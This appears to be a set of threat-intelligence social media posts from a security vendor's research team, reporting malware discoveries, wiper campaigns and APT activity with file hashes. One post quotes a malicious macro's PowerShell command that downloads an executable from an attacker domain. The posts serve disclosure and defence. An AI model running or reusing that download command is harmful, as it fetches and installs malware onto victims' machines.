Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets. bit.ly/3p9jaUJ #SolarWinds #Raindrop #Sunburst
Update on #wiper attacks against #ukraine. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. symantec-enterprise-blogs.se… IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
Interesting detail from our analysis of the decoy ransomware used in #ukraine #wiper attacks. Strings made mocking references to U.S. president Joe Biden.
Another wiper attack targeting organizations in Albania by the Iranian Druidfly group. SHA256: 81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7 #wiper #druidfly #iran (1 of 5)
Our Threat Hunter Team has encountered a new variant of #SiestaGraph, malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
THREAD: Latest on #WhisperGate wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. (1/4)
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka #SideCopy). Recent attack involved modified version of #NightFury backdoor. (1/5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia. There is VBA macro code:
powershell iwr https://karabakhtelekom[.]com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
Ongoing campaign targeting IIS servers incl one airline in Middle East. Unknown payload (goopdate32.dll), likely sideloaded. Actor & motive unknown. Similar to reported Seedworm (MuddyWater) activity but low confidence. Also some low confidence links to Damselfly activity (1 of 2)
Read our blog to find out how advanced malware #Daxin attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more: symantec-enterprise-blogs.se… #infosec
. @Symantec has identified the #Orangeworm attack group, which uses the #Kwampirs malware to target large healthcare-related firms in the U.S., Europe, and Asia symc.ly/2K1oJjU